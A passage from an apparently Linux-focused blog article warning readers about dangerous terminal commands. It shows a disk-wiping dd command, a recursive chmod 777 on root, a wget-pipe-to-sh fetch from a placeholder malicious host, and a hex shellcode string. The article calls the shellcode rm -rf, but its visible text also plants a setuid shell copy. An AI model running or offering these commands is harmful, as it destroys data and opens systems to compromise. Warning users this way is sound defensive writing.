<p>The /dev/random is one command in Linux that can create garbage data. Combine it with the <a href="https://linuxhandbook.com/dd-command/" data-lasso-id="86010">dd command</a> and your partition, and you get a Molotov to set your partition on fire.</p>
<pre class="wp-block-code"><code>dd if=/dev/random of=/dev/sda</code></pre>
<p>dd command is used as a low-level copying tool. Here, it takes random data from <code>/dev/random</code> and replaces the partition <code>/dev/sda</code> with this garbage.</p>
<p>A similar kind of effect is obtained with:</p>
<pre class="wp-block-code"><code>cat /dev/urandom &gt; filename</code></pre>
<p>Here, it takes garbage data from /dev/urandom and fills in a file. If not terminated with Ctrl + C, the file can occupy a considerable amount of space, which may be disastrous for low-end systems.</p>
<h2>8. Expose your system to everyone</h2>
<p>Everything is a file in Linux and every <a rel="noopener" href="https://linuxhandbook.com/linux-file-permissions/" data-type="URL" data-id="https://linuxhandbook.com/linux-file-permissions/" target="_blank" data-lasso-id="86011">file has certain permissions</a>.</p>
<p>You can view the permissions with <code>ls -l</code>. The root file system is not accessible to other users without privileges. While this ensures a private and secure system, you can upside down this system with one single command.</p>
<pre class="wp-block-code"><code>chmod -R 777/</code></pre>
<p>The above command exposes all files on the root partition to everyone. What it means is that everyone using the system has read, write, and execution permission. This is not good for your system.</p>
<h2>9. Download and run malicious content</h2>
<p>How do you install software in Linux? You use the official package manager or ready to use packages as Deb/RPM, Snap. Flatpak etc.</p>
<p>However, some software are not packaged and their developers provide shell scripts to download and run. Take <a href="https://itsfoss.com/homebrew-linux/" target="_blank" rel="noopener" data-lasso-id="86012">homebrew</a> for example.</p>
<p>You download a shell file and run it as root to install a software in your system. Do you see the problem with it? </p>
<p>While it works with official software like Homebrew, you should double check the content of the shell script you are downloading before running it directly like this:</p>
<pre class="wp-block-code"><code>wget http://malicious_source -O- | sh</code></pre>
<p>Such commands will download and run malicious scripts in your system, which can undermine the security of your system.</p>
<h2>10. Disguised commands</h2>
<p>There are many ways you can run commands in a Linux terminal. One such way is the hex-coded commands.</p>
<pre class="wp-block-code"><code>char esp&#91;] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;</code></pre>
<p>While it looks fancy, this is a coded version of <code>rm -rf</code> command. It does the same effect as running the previous command. So, while copying and pasting such fancy commands from the internet, be cautious.</p>
<h2>Wrapping Up</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://itsfoss.com/wp-content/uploads/2022/09/pebkac.jpg" data-lasso-id="86013"><img data-attachment-id="101884" data-permalink="https://itsfoss.com/dangerous-linux-commands/pebkac/" data-orig-file="https://itsfoss.com/wp-content/uploads/2022/09/pebkac.jpg" data-orig-size="612,451" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="pebkac" data-image-description data-image-caption="&lt;p&gt;pebkac&lt;/p&gt;
" data-medium-file="https://itsfoss.com/wp-content/uploads/2022/09/pebkac-300x221.jpg" data-large-file="https://itsfoss.com/wp-content/uploads/2022/09/pebkac.jpg" width="612" height="451" src="https://itsfoss.com/wp-content/uploads/2022/09/pebkac.jpg" alt="pebkac" class="wp-image-101884 jetpack-lazy-image" data-lazy-srcset="https://itsfoss.com/wp-content/uploads/2022/09/pebkac.jpg 612w, https://itsfoss.com/wp-content/uploads/2022/09/pebkac-300x221.jpg 300w" data-lazy-sizes="(max-width: 612px) 100vw, 612px" data-lazy-src="https://itsfoss.com/wp-content/uploads/2022/09/pebkac.jpg?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"><noscript><img data-lazy-fallback="1" data-attachment-id="101884" data-permalink="https://itsfoss.com/dangerous-linux-commands/pebkac/" data-orig-file="https://itsfoss.com/wp-content/uploads/2022/09/pebkac.jpg" data-orig-size="612,451" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="pebkac" data-image-description="" data-image-caption="&lt;p&gt;pebkac&lt;/p&gt;
" data-medium-file="https://itsfoss.com/wp-content/uploads/2022/09/pebkac-300x221.jpg" data-large-file="https://itsfoss.com/wp-content/uploads/2022/09/pebkac.jpg" loading="lazy" width="612" height="451" src="https://itsfoss.com/wp-content/uploads/2022/09/pebkac.jpg" alt="pebkac" class="wp-image-101884" srcset="https://itsfoss.com/wp-content/uploads/2022/09/pebkac.jpg 612w, https://itsfoss.com/wp-content/uploads/2022/09/pebkac-300x221.jpg 300w" sizes="(max-width: 612px) 100vw, 612px"  /></noscript></a></figure></div>
<p>There is a famous computing term PEBKAC; &#8220;problem exists between keyboard and chair.&#8221;</p>
<p>Because in the end, it&#8217;s up to the user (you) to ensure that you don&#8217;t destroy the system by blindly running any dangerous command.</p>
<blockquote class="wp-block-quote"><p>It is not UNIX’s job to stop you from shooting your foot. If you so choose to do so, then it is UNIX’s job to deliver Mr. Bullet to Mr Foot in the most efficient way it knows.</p></blockquote>
<p>And that line equally applies to Linux. You get full control over your operating system. What you choose to do with is totally up to you.</p>
<p>I advise these things to ensure a safer experience:</p>
<ul><li>Try and understand the commands you are about to run. </li><li>Keep a backup of your system settings with Timeshift</li><li>Keep a backup of personal data (home directory) using DejaDup</li></ul>
<p>As I said, there is no fixed list of dangerous Linux commands. A lot more can be added to this list and there is simply no end to it.</p>
<p>I hope this gives you some hints about what you should not be doing to stay safe with Linux. Let me know if you have suggestions in the comment section.</p><span class="tve-leads-two-step-trigger tl-2step-trigger-0"></span><span class="tve-leads-two-step-trigger tl-2step-trigger-0"></span>
<interaction data-token="5caa056167b3b4fc52f9ace9" data-context="true" data-tags="" data-fallback="true"></interaction>
</div>
</div>
</article>
<link rel='stylesheet' id='kadence-author-box-css' href='https://itsfoss.com/wp-content/themes/kadence/assets/css/author-box.min.css?ver=1.1.27' media='all' />
<div class="entry-author entry-author-style-center">
<div class="entry-author-profile author-profile vcard">
<div class="entry-author-avatar">
<img alt src="https://itsfoss.com/wp-content/gravatars/2003563996b123e9460848e5ea27f4d6" class="avatar avatar-80 photo jetpack-lazy-image" height="80" width="80" data-lazy-srcset="https://itsfoss.com/wp-content/gravatars/2003563996b123e9460848e5ea27f4d6 2x" data-lazy-src="https://itsfoss.com/wp-content/gravatars/2003563996b123e9460848e5ea27f4d6?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"><noscript><img data-lazy-fallback="1" alt='' src='https://itsfoss.com/wp-content/gravatars/2003563996b123e9460848e5ea27f4d6' srcset='https://itsfoss.com/wp-content/gravatars/2003563996b123e9460848e5ea27f4d6 2x' class='avatar avatar-80 photo' height='80' width='80' loading='lazy' /></noscript> </div>
<b class="entry-author-name author-name fn"><a href="https://itsfoss.com/author/abhishek/" title="Posts by Abhishek Prakash" rel="author">Abhishek Prakash</a></b>
<div class="entry-author-description author-bio">
<p>Creator of It's FOSS. An ardent Linux user &amp; open source promoter. Huge fan of classic detective mysteries ranging from Agatha Christie and Sherlock Holmes to Detective Columbo &amp; Ellery Queen. Also a movie buff with a soft corner for film noir.</p>
</div>
<div class="entry-author-follow author-follow">
</div>
</div>
</div>
<nav class="navigation post-navigation" aria-label="Posts">
<h2 class="screen-reader-text">Post navigation</h2>
<div class="nav-links"><div class="nav-previous"><a href="https://itsfoss.com/komikku-manga-reader/" rel="prev"><div class="post-navigation-sub"><small><span class="kadence-svg-iconset svg-baseline"><svg aria-hidden="true" class="kadence-svg-icon kadence-arrow-left-alt-svg" fill="currentColor" version="1.1" xmlns="http://www.w3.org/2000/svg" width="29" height="28" viewBox="0 0 29 28"><title>Previous</title><path d="M28 12.5v3c0 0.281-0.219 0.5-0.5 0.5h-19.5v3.5c0 0.203-0.109 0.375-0.297 0.453s-0.391 0.047-0.547-0.078l-6-5.469c-0.094-0.094-0.156-0.219-0.156-0.359v0c0-0.141 0.063-0.281 0.156-0.375l6-5.531c0.156-0.141 0.359-0.172 0.547-0.094 0.172 0.078 0.297 0.25 0.297 0.453v3.5h19.5c0.281 0 0.5 0.219 0.5 0.5z"></path>
</svg></span>Previous</small></div>Komikku: A Free and Open-Source Manga Reader for Linux</a></div></div>
</nav><link rel='stylesheet' id='kadence-related-posts-css' href='https://itsfoss.com/wp-content/themes/kadence/assets/css/related-posts.min.css?ver=1.1.27' media='all' />
<link rel='stylesheet' id='kadence-splide-css' href='https://itsfoss.com/wp-content/plugins/kadence-blocks-pro/dist/assets/css/kadence-splide.min.css?ver=1.7.15' media='all' />
<div class="entry-related alignfull entry-related-style-wide">
<div class="entry-related-inner content-container site-container">
<div class="entry-related-inner-content alignwide">
<h2 class="entry-related-title">Similar Posts</h2> <div class="entry-related-carousel kadence-slide-init splide" data-columns-xxl="2" data-columns-xl="2" data-columns-md="2" data-columns-sm="2" data-columns-xs="2" data-columns-ss="1" data-slider-anim-speed="400" data-slider-scroll="1" data-slider-dots="true" data-slider-arrows="true" data-slider-hover-pause="false" data-slider-auto="false" data-slider-speed="7000" data-slider-gutter="40" data-slider-loop="false" data-slider-next-label="Next" data-slider-slide-label="Posts" data-slider-prev-label="Previous">
<div class="splide__track">
<div class="splide__list grid-cols grid-sm-col-2 grid-lg-col-2">
<div class="carousel-item splide__slide">
<article class="entry content-bg loop-entry post-26548 post type-post status-publish format-standard has-post-thumbnail hentry category-list tag-arch-linux">
<a class="post-thumbnail kadence-thumbnail-ratio-2-3" href="https://itsfoss.com/things-to-do-after-installing-arch-linux/">
<div class="post-thumbnail-inner">
<img width="768" height="432" src="https://itsfoss.com/wp-content/uploads/2018/01/things-to-do-after-installing-arch-linux-768x432.jpg" class="attachment-medium_large size-medium_large wp-post-image jetpack-lazy-image" alt="7 Essential Things To Do After Installing Arch Linux " data-attachment-id="78604" data-permalink="https://itsfoss.com/things-to-do-after-installing-arch-linux/things-to-do-after-installing-arch-linux-3/" data-orig-file="https://itsfoss.com/wp-content/uploads/2018/01/things-to-do-after-installing-arch-linux.jpg" data-orig-size="800,450" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="things-to-do-after-installing-arch-linux" data-image-description data-image-caption data-medium-file="https://itsfoss.com/wp-content/uploads/2018/01/things-to-do-after-installing-arch-linux-300x169.jpg" data-large-file="https://itsfoss.com/wp-content/uploads/2018/01/things-to-do-after-installing-arch-linux.jpg" data-lazy-srcset="https://itsfoss.com/wp-content/uploads/2018/01/things-to-do-after-installing-arch-linux-768x432.jpg 768w, https://itsfoss.com/wp-content/uploads/2018/01/things-to-do-after-installing-arch-linux-300x169.jpg 300w, https://itsfoss.com/wp-content/uploads/2018/01/things-to-do-after-installing-arch-linux.jpg 800w" data-lazy-sizes="(max-width: 768px) 100vw, 768px" data-lazy-src="https://itsfoss.com/wp-content/uploads/2018/01/things-to-do-after-installing-arch-linux-768x432.jpg?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"> </div>
</a>
<div class="entry-content-wrap">
<header class="entry-header">
<div class="entry-taxonomies">
<span class="category-links term-links category-style-normal">
<a href="https://itsfoss.com/category/list/" rel="tag">List</a> </span>
</div>
<h3 class="entry-title"><a href="https://itsfoss.com/things-to-do-after-installing-arch-linux/" rel="bookmark">7 Essential Things To Do After Installing Arch Linux </a></h3><div class="entry-meta entry-meta-divider-dot">
<span class="posted-by"><span class="meta-label">By</span><span class="author vcard"><a class="url fn n" href="https://itsfoss.com/author/ambarish/">Ambarish Kumar</a></span></span> <span class="posted-on">
<time class="entry-date published" datetime="2018-01-21T20:16:51+05:30">January 21, 2018</time><time class="updated" datetime="2020-06-01T17:26:41+05:30">June 1, 2020</time> </span>
<span class="kt-reading-time-wrap"><span class="kt-reading-time"> <span class="kt-reading-time-label">Reading Time:</span> 7 <span class="kt-reading-time-postfix">minutes</span> </span></span></div>
</header>
<div class="entry-summary">
<p>This tutorial shows you a few essential things to do after installing Arch Linux. This will help you get started with Arch Linux so that you can explore it further.</p>
</div>
<footer class="entry-footer">
<div class="entry-actions">
<p class="more-link-wrap">
<a href="https://itsfoss.com/things-to-do-after-installing-arch-linux/" class="post-more-link">
Read More<span class="screen-reader-text"> 7 Essential Things To Do After Installing Arch Linux </span><span class="kadence-svg-iconset svg-baseline"><svg aria-hidden="true" class="kadence-svg-icon kadence-arrow-right-alt-svg" fill="currentColor" version="1.1" xmlns="http://www.w3.org/2000/svg" width="27" height="28" viewBox="0 0 27 28"><title>Continue</title><path d="M27 13.953c0 0.141-0.063 0.281-0.156 0.375l-6 5.531c-0.156 0.141-0.359 0.172-0.547 0.094-0.172-0.078-0.297-0.25-0.297-0.453v-3.5h-19.5c-0.281 0-0.5-0.219-0.5-0.5v-3c0-0.281 0.219-0.5 0.5-0.5h19.5v-3.5c0-0.203 0.109-0.375 0.297-0.453s0.391-0.047 0.547 0.078l6 5.469c0.094 0.094 0.156 0.219 0.156 0.359v0z"></path>
</svg></span> </a>
</p>
</div>
</footer>
</div>
</article>
</div><div class="carousel-item splide__slide">
<article class="entry content-bg loop-entry post-15812 post type-post status-publish format-standard has-post-thumbnail hentry category-reviews category-terminal-tricks tag-cli-tools tag-terminal">
<a class="post-thumbnail kadence-thumbnail-ratio-2-3" href="https://itsfoss.com/nnn-file-browser-linux/">
<div class="post-thumbnail-inner">
<img width="768" height="432" src="https://itsfoss.com/wp-content/uploads/2017/04/nnn-file-browser-768x432.jpg" class="attachment-medium_large size-medium_large wp-post-image jetpack-lazy-image" alt="nnn: A Blazing Fast Terminal File Browser For Pro Linux Users" data-attachment-id="15828" data-permalink="https://itsfoss.com/nnn-file-browser-linux/nnn-file-browser/" data-orig-file="https://itsfoss.com/wp-content/uploads/2017/04/nnn-file-browser.jpg" data-orig-size="800,450" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="nnn-file-browser" data-image-description data-image-caption data-medium-file="https://itsfoss.com/wp-content/uploads/2017/04/nnn-file-browser-300x169.jpg" data-large-file="https://itsfoss.com/wp-content/uploads/2017/04/nnn-file-browser-800x450.jpg" data-lazy-srcset="https://itsfoss.com/wp-content/uploads/2017/04/nnn-file-browser-768x432.jpg 768w, https://itsfoss.com/wp-content/uploads/2017/04/nnn-file-browser-300x169.jpg 300w, https://itsfoss.com/wp-content/uploads/2017/04/nnn-file-browser.jpg 800w" data-lazy-sizes="(max-width: 768px) 100vw, 768px" data-lazy-src="https://itsfoss.com/wp-content/uploads/2017/04/nnn-file-browser-768x432.jpg?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"> </div>
</a>
<div class="entry-content-wrap">
<header class="entry-header">
<div class="entry-taxonomies">
<span class="category-links term-links category-style-normal">
<a href="https://itsfoss.com/category/reviews/" rel="tag">Reviews</a> | <a href="https://itsfoss.com/category/terminal-tricks/" rel="tag">Terminal Tools and Tricks</a> </span>
</div>
<h3 class="entry-title"><a href="https://itsfoss.com/nnn-file-browser-linux/" rel="bookmark">nnn: A Blazing Fast Terminal File Browser For Pro Linux Users</a></h3><div class="entry-meta entry-meta-divider-dot">
<span class="posted-by"><span class="meta-label">By</span><span class="author vcard"><a class="url fn n" href="https://itsfoss.com/author/munif/">Munif Tanjim</a></span></span> <span class="posted-on">
<time class="entry-date published" datetime="2017-04-25T00:49:55+05:30">April 25, 2017</time><time class="updated" datetime="2020-10-08T10:49:16+05:30">October 8, 2020</time> </span>
<span class="kt-reading-time-wrap"><span class="kt-reading-time"> <span class="kt-reading-time-label">Reading Time:</span> 4 <span class="kt-reading-time-postfix">minutes</span> </span></span></div>
</header>
<div class="entry-summary">
<p>nnn is a blazing-fast lightweight terminal file browser for Linux with easy keyboard shortcuts for navigation, opening files and running tasks.</p>
</div>
<footer class="entry-footer">
<div class="entry-actions">
<p class="more-link-wrap">
<a href="https://itsfoss.com/nnn-file-browser-linux/" class="post-more-link">
Read More<span class="screen-reader-text"> nnn: A Blazing Fast Terminal File Browser For Pro Linux Users</span><span class="kadence-svg-iconset svg-baseline"><svg aria-hidden="true" class="kadence-svg-icon kadence-arrow-right-alt-svg" fill="currentColor" version="1.1" xmlns="http://www.w3.org/2000/svg" width="27" height="28" viewBox="0 0 27 28"><title>Continue</title><path d="M27 13.953c0 0.141-0.063 0.281-0.156 0.375l-6 5.531c-0.156 0.141-0.359 0.172-0.547 0.094-0.172-0.078-0.297-0.25-0.297-0.453v-3.5h-19.5c-0.281 0-0.5-0.219-0.5-0.5v-3c0-0.281 0.219-0.5 0.5-0.5h19.5v-3.5c0-0.203 0.109-0.375 0.297-0.453s0.391-0.047 0.547 0.078l6 5.469c0.094 0.094 0.156 0.219 0.156 0.359v0z"></path>
</svg></span> </a>
</p>
</div>
</footer>
</div>
</article>
</div><div class="carousel-item splide__slide">
<article class="entry content-bg loop-entry post-99 post type-post status-publish format-standard has-post-thumbnail hentry category-list category-apps tag-linux tag-office tag-open-source-software">
<a class="post-thumbnail kadence-thumbnail-ratio-2-3" href="https://itsfoss.com/best-free-open-source-alternatives-microsoft-office/">
<div class="post-thumbnail-inner">
<img width="768" height="432" src="https://itsfoss.com/wp-content/uploads/2012/06/best-open-source-alternatives-ms-office-768x432.jpg" class="attachment-medium_large size-medium_large wp-post-image jetpack-lazy-image" alt="6 Best Open Source Alternatives to Microsoft Office for Linux" data-attachment-id="25074" data-permalink="https://itsfoss.com/best-free-open-source-alternatives-microsoft-office/best-open-source-alternatives-ms-office/" data-orig-file="https://itsfoss.com/wp-content/uploads/2012/06/best-open-source-alternatives-ms-office.jpg" data-orig-size="800,450" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="best-open-source-alternatives-ms-office" data-image-description data-image-caption data-medium-file="https://itsfoss.com/wp-content/uploads/2012/06/best-open-source-alternatives-ms-office-300x169.jpg" data-large-file="https://itsfoss.com/wp-content/uploads/2012/06/best-open-source-alternatives-ms-office-800x450.jpg" data-lazy-srcset="https://itsfoss.com/wp-content/uploads/2012/06/best-open-source-alternatives-ms-office-768x432.jpg 768w, https://itsfoss.com/wp-content/uploads/2012/06/best-open-source-alternatives-ms-office-300x169.jpg 300w, https://itsfoss.com/wp-content/uploads/2012/06/best-open-source-alternatives-ms-office.jpg 800w" data-lazy-sizes="(max-width: 768px) 100vw, 768px" data-lazy-src="https://itsfoss.com/wp-content/uploads/2012/06/best-open-source-alternatives-ms-office-768x432.jpg?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"> </div>
</a>
<div class="entry-content-wrap">
<header class="entry-header">
<div class="entry-taxonomies">
<span class="category-links term-links category-style-normal">
<a href="https://itsfoss.com/category/list/" rel="tag">List</a> | <a href="https://itsfoss.com/category/apps/" rel="tag">Software</a> </span>
</div>
<h3 class="entry-title"><a href="https://itsfoss.com/best-free-open-source-alternatives-microsoft-office/" rel="bookmark">6 Best Open Source Alternatives to Microsoft Office for Linux</a></h3><div class="entry-meta entry-meta-divider-dot">
<span class="posted-by"><span class="meta-label">By</span><span class="author vcard"><a class="url fn n" href="https://itsfoss.com/">Abhishek Prakash</a></span></span> <span class="posted-on">
<time class="entry-date published" datetime="2012-06-24T23:03:36+05:30">June 24, 2012</time><time class="updated" datetime="2022-07-28T10:12:12+05:30">July 28, 2022</time> </span>
<span class="kt-reading-time-wrap"><span class="kt-reading-time"> <span class="kt-reading-time-label">Reading Time:</span> 5 <span class="kt-reading-time-postfix">minutes</span> </span></span></div>
</header>
<div class="entry-summary">
<p>Looking for Microsoft Office in Linux? Here are the best free and open source alternatives to Microsoft Office for Linux.</p>
</div>
<footer class="entry-footer">
<div class="entry-actions">
<p class="more-link-wrap">
<a href="https://itsfoss.com/best-free-open-source-alternatives-microsoft-office/" class="post-more-link">
Read More<span class="screen-reader-text"> 6 Best Open Source Alternatives to Microsoft Office for Linux</span><span class="kadence-svg-iconset svg-baseline"><svg aria-hidden="true" class="kadence-svg-icon kadence-arrow-right-alt-svg" fill="currentColor" version="1.1" xmlns="http://www.w3.org/2000/svg" width="27" height="28" viewBox="0 0 27 28"><title>Continue</title><path d="M27 13.953c0 0.141-0.063 0.281-0.156 0.375l-6 5.531c-0.156 0.141-0.359 0.172-0.547 0.094-0.172-0.078-0.297-0.25-0.297-0.453v-3.5h-19.5c-0.281 0-0.5-0.219-0.5-0.5v-3c0-0.281 0.219-0.5 0.5-0.5h19.5v-3.5c0-0.203 0.109-0.375 0.297-0.453s0.391-0.047 0.547 0.078l6 5.469c0.094 0.094 0.156 0.219 0.156 0.359v0z"></path>
</svg></span> </a>
</p>
</div>
</footer>
</div>
</article>
</div><div class="carousel-item splide__slide">
<article class="entry content-bg loop-entry post-16051 post type-post status-publish format-standard has-post-thumbnail hentry category-games category-list tag-games tag-linux tag-steam">
<a class="post-thumbnail kadence-thumbnail-ratio-2-3" href="https://itsfoss.com/download-linux-games/">
<div class="post-thumbnail-inner">
<img width="768" height="432" src="https://itsfoss.com/wp-content/uploads/2017/05/download-linux-games-768x432.jpg" class="attachment-medium_large size-medium_large wp-post-image jetpack-lazy-image" alt="Fantastic Linux Games and Where to Find Them" data-attachment-id="16071" data-permalink="https://itsfoss.com/download-linux-games/download-linux-games-2/" data-orig-file="https://itsfoss.com/wp-content/uploads/2017/05/download-linux-games.jpg" data-orig-size="800,450" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="download-linux-games" data-image-description data-image-caption data-medium-file="https://itsfoss.com/wp-content/uploads/2017/05/download-linux-games-300x169.jpg" data-large-file="https://itsfoss.com/wp-content/uploads/2017/05/download-linux-games-800x450.jpg" data-lazy-srcset="https://itsfoss.com/wp-content/uploads/2017/05/download-linux-games-768x432.jpg 768w, https://itsfoss.com/wp-content/uploads/2017/05/download-linux-games-300x169.jpg 300w, https://itsfoss.com/wp-content/uploads/2017/05/download-linux-games.jpg 800w" data-lazy-sizes="(max-width: 768px) 100vw, 768px" data-lazy-src="https://itsfoss.com/wp-content/uploads/2017/05/download-linux-games-768x432.jpg?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"> </div>
</a>
<div class="entry-content-wrap">
<header class="entry-header">
<div class="entry-taxonomies">
<span class="category-links term-links category-style-normal">
<a href="https://itsfoss.com/category/games/" rel="tag">Games</a> | <a href="https://itsfoss.com/category/list/" rel="tag">List</a> </span>
</div>
<h3 class="entry-title"><a href="https://itsfoss.com/download-linux-games/" rel="bookmark">Fantastic Linux Games and Where to Find Them</a></h3><div class="entry-meta entry-meta-divider-dot">
<span class="posted-by"><span class="meta-label">By</span><span class="author vcard"><a class="url fn n" href="https://itsfoss.com/author/munif/">Munif Tanjim</a></span></span> <span class="posted-on">
<time class="entry-date published" datetime="2017-05-23T22:48:58+05:30">May 23, 2017</time><time class="updated" datetime="2021-08-13T12:15:37+05:30">August 13, 2021</time> </span>
<span class="kt-reading-time-wrap"><span class="kt-reading-time"> <span class="kt-reading-time-label">Reading Time:</span> 5 <span class="kt-reading-time-postfix">minutes</span> </span></span></div>
</header>
<div class="entry-summary">
<p>A list of games stores with best games available for Linux platform. Download free Linux games or buy premium ones. These websites have everything for your gaming needs on Linux.</p>
</div>
<footer class="entry-footer">
<div class="entry-actions">
<p class="more-link-wrap">
<a href="https://itsfoss.com/download-linux-games/" class="post-more-link">
Read More<span class="screen-reader-text"> Fantastic Linux Games and Where to Find Them</span><span class="kadence-svg-iconset svg-baseline"><svg aria-hidden="true" class="kadence-svg-icon kadence-arrow-right-alt-svg" fill="currentColor" version="1.1" xmlns="http://www.w3.org/2000/svg" width="27" height="28" viewBox="0 0 27 28"><title>Continue</title><path d="M27 13.953c0 0.141-0.063 0.281-0.156 0.375l-6 5.531c-0.156 0.141-0.359 0.172-0.547 0.094-0.172-0.078-0.297-0.25-0.297-0.453v-3.5h-19.5c-0.281 0-0.5-0.219-0.5-0.5v-3c0-0.281 0.219-0.5 0.5-0.5h19.5v-3.5c0-0.203 0.109-0.375 0.297-0.453s0.391-0.047 0.547 0.078l6 5.469c0.094 0.094 0.156 0.219 0.156 0.359v0z"></path>
</svg></span> </a>
</p>
</div>
</footer>
</div>
</article>
</div><div class="carousel-item splide__slide">
<article class="entry content-bg loop-entry post-95241 post type-post status-publish format-standard has-post-thumbnail hentry category-list category-news">
<a class="post-thumbnail kadence-thumbnail-ratio-2-3" href="https://itsfoss.com/ubuntu-22-04-release-features/">
<div class="post-thumbnail-inner">
<img width="768" height="432" src="https://itsfoss.com/wp-content/uploads/2022/01/ubuntu-22-04-768x432.png" class="attachment-medium_large size-medium_large wp-post-image jetpack-lazy-image" alt="Here are the New Features in Ubuntu 22.04 LTS Jammy Jellyfish" data-attachment-id="95255" data-permalink="https://itsfoss.com/ubuntu-22-04-release-features/ubuntu-22-04/" data-orig-file="https://itsfoss.com/wp-content/uploads/2022/01/ubuntu-22-04.png" data-orig-size="1200,675" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="ubuntu-22-04" data-image-description data-image-caption data-medium-file="https://itsfoss.com/wp-content/uploads/2022/01/ubuntu-22-04-300x169.png" data-large-file="https://itsfoss.com/wp-content/uploads/2022/01/ubuntu-22-04-800x450.png" data-lazy-srcset="https://itsfoss.com/wp-content/uploads/2022/01/ubuntu-22-04-768x432.png 768w, https://itsfoss.com/wp-content/uploads/2022/01/ubuntu-22-04-300x169.png 300w, https://itsfoss.com/wp-content/uploads/2022/01/ubuntu-22-04-800x450.png 800w, https://itsfoss.com/wp-content/uploads/2022/01/ubuntu-22-04.png 1200w" data-lazy-sizes="(max-width: 768px) 100vw, 768px" data-lazy-src="https://itsfoss.com/wp-content/uploads/2022/01/ubuntu-22-04-768x432.png?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"> </div>
</a>
<div class="entry-content-wrap">
<header class="entry-header">
